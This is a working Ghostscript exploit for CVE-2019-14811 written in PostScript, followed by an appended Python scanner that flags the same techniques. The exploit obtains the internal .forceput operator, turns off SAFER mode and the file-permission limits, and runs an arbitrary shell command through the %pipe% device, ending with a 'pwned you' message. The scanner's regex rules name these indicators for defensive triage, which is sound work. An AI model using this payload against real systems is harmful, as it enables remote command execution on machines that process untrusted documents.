%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
/exploit {{
    /println {{ (\\n) exch print print }} bind executeonly def
    /info {{ ([*] ) print println }} bind executeonly def
    /success {{ ([+] ) print println }} bind executeonly def
    /fail {{ ([-] ) print println stop }} bind executeonly def
    /MaxFileSize 16#10000 def
    /readfile {{
        (r) file
        dup MaxFileSize string readstring pop
        exch closefile
    }} bind executeonly def
    /osexec {{
        (%pipe%) exch concatstrings readfile
    }} bind executeonly def
    (=============================================================================)
    (= CVE-2019-14811 =)
    (=============================================================================)
    println println println
    (Obtaining .forceput operator from .pdf_hook_DSC_Creator operator...) info
    /.forceput null def
    systemdict /.pdfdsc get 24 get /.pdf_hook_DSC_Creator exch def
    /typecheckcount 0 def
    /&typecheck errordict /typecheck get def
    errordict /typecheck {{
        /typecheckcount typecheckcount 1 add def
        typecheckcount 2 eq {{
            1 index 2 get 8 get
            /.forceput exch store
        }} if
    }} put
    null .pdf_hook_DSC_Creator clear
    errordict /typecheck /&typecheck load put
    [
        /&typecheck
        /typecheckcount
        /.pdf_hook_DSC_Creator
    ] {{ currentdict exch undef }} forall
    (A candidate for .forceput operator found!) success
    (Attempting sanity check with the candidate for .forceput operator...) info
    << /overwritten false >> readonly
    begin
        currentdict /overwritten true .forceput
        overwritten not {{
            /.forceput where {{ /.forceput undef }} if
        }} if
    end
    currentdict /.forceput known not {{
        (.forceput operator could not found...) fail
    }} if
    (Successfully got .forceput operator!) success
    (Overwriting several flags to escape from Safer Mode...) info
    systemdict /SAFER false .forceput
    userparams /LockFilePermissions false .forceput
    userparams /PermitFileControl [(*)] .forceput
    userparams /PermitFileWriting [(*)] .forceput
    userparams /PermitFileReading [(*)] .forceput
    save restore
    SAFER {{
        (Could not escape from Safer Mode.) fail
    }} bind executeonly if
    (Successfully escaped from Safer Mode!) success
    (Executing a shell command...) info
    ({cmd}) osexec pop
    % (touch /tmp/pwned) osexec pop
    (PS: I pwned you <3) success
}} def
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
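
A defender-side check, added here as an example and not part of the paste: a small scanner that flags PostScript input referencing the internal names and the %pipe% device this payload depends on, for triage of files before they reach Ghostscript. The rule labels, function names and sample inputs are assumptions of this example; hex strings and names assembled at run time are not decoded.

```python
import re

# Names the paste relies on; the rule labels are this example's own.
CODE_RULES = {
    "forceput":   re.compile(r"\.forceput\b"),
    "pdf_hook":   re.compile(r"\.pdf_hook_DSC_Creator\b"),
    "safer_off":  re.compile(r"/SAFER\s+false\b"),
    "file_perms": re.compile(r"/(?:LockFilePermissions|PermitFile(?:Control|Writing|Reading))\b"),
}

def lex(ps):
    """Split PostScript into (code, strings); a % inside ( ) is not a comment."""
    code, strings, buf, depth, i = [], [], [], 0, 0
    while i < len(ps):
        c = ps[i]
        if depth and c == "\\":              # escaped character inside a string
            buf.append(ps[i:i + 2])
            i += 1
        elif depth == 1 and c == ")":        # outermost string closes
            strings.append("".join(buf))
            buf, depth = [], 0
            code.append(" ")
        elif depth:                          # string content, parentheses may nest
            depth += (c == "(") - (c == ")")
            buf.append(c)
        elif c == "(":
            depth = 1
        elif c == "%":                       # real comment: skip to end of line
            while i + 1 < len(ps) and ps[i + 1] not in "\r\n":
                i += 1
        else:
            code.append(c)
        i += 1
    return "".join(code), strings

def scan(ps):
    code, strings = lex(ps)
    hits = {name for name, rx in CODE_RULES.items() if rx.search(code)}
    if any(s.startswith("%pipe%") for s in strings):
        hits.add("pipe_device")              # string names the pipe I/O device
    return sorted(hits)

# Constructed inputs: fragments in the shape of the paste, and a harmless file.
SAMPLE = ("systemdict /.pdfdsc get 24 get /.pdf_hook_DSC_Creator exch def\n"
          "systemdict /SAFER false .forceput\n"
          "userparams /PermitFileReading [(*)] .forceput\n"
          "(%pipe%) exch concatstrings (r) file\n")
BENIGN = "% mentions .forceput only in a comment\n(50% done (so far)) show\n"
if __name__ == "__main__":
    print(scan(SAMPLE), scan(BENIGN))
```

A naive "strip everything after %" pass would delete the (%pipe%) string and miss it, which is why the scanner tracks string literals before discarding comments.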